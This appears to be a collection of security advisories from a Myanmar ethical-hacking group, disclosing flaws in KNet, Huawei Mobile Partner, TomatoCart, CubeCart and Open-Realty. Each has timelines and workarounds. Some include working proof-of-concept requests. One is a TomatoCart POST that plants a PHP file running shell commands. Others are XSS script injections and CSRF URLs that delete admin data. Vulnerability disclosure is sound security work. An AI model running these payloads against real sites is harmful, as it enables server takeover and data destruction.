KNet Web Server Buffer Overflow Exploit (SEH)

This exploit takes advantage of KNet web server buffer overflow vulnerability and attempts to gain SHELL access on target host. See demo video here..

Exploit: https://code.google.com/p/yehg-core-exploits/source/browse/trunk/knet-web-server/knet_win7_bof-seh-sploit.rb
Demo: http://core.yehg.net/lab/pr0js/training/view/KNet_Win7_Sploit/

About KNet Web Server:

KNet is a small, functioning, webserver which you can use to host a website from your very own harddrive! KNet is so small you can run your server from a floppy disk. As KNet is a freeware application you will never be charged for using the application or for updates. 

You can literally have your website up and running within 30 seconds of installing, and running KNet. How's that for ease of use? And you need never see or think about KNet again as it can happily run in your task bar.

Here are some key features of "KNet":

￭ Custom 404 Error pages.
￭ Password protection.
￭ Ban IP addresses.
￭ Current Connections list.
￭ Last Connection.
￭ Last Page Requested.
￭ Last File Requested.
￭ Supports .ppt, .doc and .xls files direct to browser!
￭ Incredibly fast and easy to use!
￭ Directory traversing blocked....

Ref:  http://knet.softpedia.com/

Huawei Mobile Partner | Permission Weakness Local Privilege Escalation

1. DESCRIPTION

Huawei Mobile Partner application contains a flaw that may allow an
attacker to gain access to unauthorized privileges. The issue is due
to the application installing with insecure permissions. This allows a
less privileged local attacker or compromised process to replace the
original application binary with a malicious application which will be
executed by a victim user or upon Mobile Partner application Windows
service restart.


2. BACKGROUND

Mobile Partner is a built-in application in Huawei 3G USB modems that
allow you to connect to the 3G mobile network for Internet access. It
is widely used by many telcos round the world.


3. VERSIONS AFFECTED

Tested version: 23.007.09.00.203.


4. PROOF-OF-CONCEPT/EXPLOIT

//// Tested on Windows

c:\>wmic service get pathname | find "Mobile Partner"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
RW Everyone
RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe"
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
RW Everyone
RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe
RW Everyone
RW BUILTIN\Users


/// Tested on Mac

YEHG:/ tester$ find  "/Applications/Mobile Partner.app" -perm -0002 -type f -exec file {} \; | grep executable | awk -F\( '{print $1}' | uniq

/Applications/Mobile Partner.app/Contents/MacOS/mobilepartner
/Applications/MobilePartner.app/Contents/Resources/UpdateDog/LiveUpd.app/Contents/MacOS/LiveUpd
/Applications/MobilePartner.app/Contents/Resources/UpdateDog/ouc.app/Contents/MacOS/ouc
/Applications/MobilePartner.app/Contents/Resources/XStartScreen.app/Contents/MacOS/XStartScreen



5. SOLUTION

The vendor has not responded to our security report for months.
Workaround is to remove WRITE attribute permission on all Mobile
Partner executable files for non-administrator and non-system
accounts.


6. VENDOR

Huawei Technologies Co.,Ltd


7. CREDIT

Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2012-10-xx: Contacted the vendor through publicly mentioned emails and forums
2013-02-11: No response
2013-02-11: Vulnerability not fixed
2013-02-11: Vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission

#yehg [2013-02-11]

TomatoCart 1.x | Cross Site Request Forgery Protection Bypass via JavaScript Hijacking

1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Cross Site Request Forgery
Protection Bypass.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the script
'/admin/tocdesktop.php' failure to properly protect the JavaScript
object, "token" which is used to prevent Cross Site Request Forgery
attack. This allows an attacker to gain access to the token object via
JavaScript Hijacking upon an administrator user's visit to his crafted
page. Using the compromised token value, the attacker will then be
able to perform administrator-privileged functions such as uploading
file, creating user accounts and so forth.


4. VERSIONS AFFECTED

Tested on 1.x

(Note that we did not verify this issue on upcoming 2.x version -
currently it's on alpha.)


5. PROOF-OF-CONCEPT/EXPLOIT

The following recorded movie will demonstrate how we can leverage the
CSRF-bypass flaw to create an arbitrary shell script.

http://yehg.net/lab/pr0js/training/view/misc/TomatoCart-Anti-CSRF-Bypass-2-Shell/


6. SOLUTION

The vendor did not show commitment in hardening the application.
Workaround is not to visit malicious web sites during login or to use
a dedicated browser for TomatoCart administration.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability information was sent
2013-01-07: Vulnerability not fixed
2013-01-07: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_ant-csrf_bypass
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_vulnerable_piwik
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-07]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

TomatoCart 1.x | Vulnerable Piwik Extension

1. OVERVIEW

TomatoCart 1.x versions include outdated and vulnerable Piwik extension < 0.5.5.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions include outdated and vulnerable Piwik
extension < 0.5.5 according to the the Piwik SVN checkout date
specified in /ext/piwik/index.php. This Piwik version has known
vulnerabilities such as Cross Site Scripting, Arbitrary URL Redirect
and Denial-of-Service.


4. VERSIONS AFFECTED

1.x


5. PROOF-OF-CONCEPT/EXPLOIT

Refer to REFERENCES section for the OSVDB site URL featuring known
Piwik vulnerabilities.


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-05: Vulnerability not fixed
2013-01-05: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_vulnerable_piwik
TomatoCart Home Page: http://www.tomatocart.com/
Piwik Reported Vulnerabilities:
http://osvdb.org/search/search?search%5Bvuln_title%5D=piwik&search%5Btext_type%5D=alltext&search%5Bs_date%5D=January+1%2C+2010&search%5Be_date%5D=January+5%2C+2013

#yehg [2013-01-05]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

TomatoCart 1.x | Unrestricted File Creation

1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the /admin/json.php
script's failure to properly restrict created files. This may allow an
attacker to create arbitrary shell script to launch further attacks on
the application server.


4. VERSIONS AFFECTED

Tested on 1.1.8, 1.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

/////////////////////////////////////////////////////////////////////
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
///////////////////////////////////////////////////////////////


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-04]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

CubeCart 5.x | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

5.x


5. Affected URLs and Parameters

/admin.php (report[date][from] parameter]
/admin.php (report[date][to] parameter)
/index.php (review[email] parameter)
/index.php (review[name] parameter)
/index.php (review[title] parameter)
/admin.php (report[date][from] parameter)


6. SOLUTION

The vendor has chosen not to fix the issue.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_xss
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

CubeCart 5.x | Cross Site Request Forgery (CSRF) Vulnerability

1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Request Forgery (CSRF).


2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.x versions contain a flaw that allows a remote Cross-site
Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require multiple steps or explicit confirmation
for sensitive transactions for majority of administrator functions
such as adding new user, assigning user to administrative privilege.
By using a crafted URL, an attacker may trick the victim into visiting
to his web page to take advantage of the trust relationship between
the authenticated victim and the application. Such an attack could
trick the victim into executing arbitrary commands in the context of
their session with the application, without further prompting or
verification.


4. VERSIONS AFFECTED

5.x


5. Proof-of-Concept

http://localhost/admin.php?_g=documents&node=index&delete=1 (Delete
file in Site Documents)
http://localhost/admin.php?_g=filemanager&mode=digital&delete=1
(Delete file in File Manager)
http://localhost/admin.php?_g=settings&node=admins&action=edit&admin_id=2
(Delete user)
http://localhost/admin.php?_g=customers&sort%5Bregistered%5D=DESC&action=delete&customer_id=1
(Delete customer user)
http://localhost/admin.php?_g=products&sort%5Bupdated%5D=DESC&delete=1
(Delete product)


6. SOLUTION

The vendor has chosen not to fix the issue.
Workaround is not to visit malicious sites during log-in.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_csrf
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

CubeCart 5.0.7 and lower versions | Insecure Backup File Handling

1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
File Handling which leads to the disclosure of the application
configuration file.


2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
up the configuration file, "global.inc.php", upon new installation or
upgrade process. The name of backup configuration file is set to the
year, month, day, hour, minute that the process is performed. The
non-randomized nature of this backup scheme allows an attacker to
retrieve the file through brute-force method.


4. VERSIONS AFFECTED

5.0.7 and lower versions


5. Affected Files

/setup/setup.install.php
/setup/setup.upgrade.php

///////////CODE //////////////
##Backup existing config file, if it exists
if (file_exists($global_file)) {
rename($global_file, $global_file.'-'.date('Ymdgi'));
}
/////////////////////////

e.g.
http://127.0.0.1/cube507/includes/global.inc.php-2012021245719 \


6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-28: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-28]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability

1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

/admin/ajax.php (parameter: title, full_desc, ta)

///////////////////////////////////////////////////////

POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;

edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=

///////////////////////////////////////////////////////
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;

blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us
///////////////////////////////////////////////////////


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd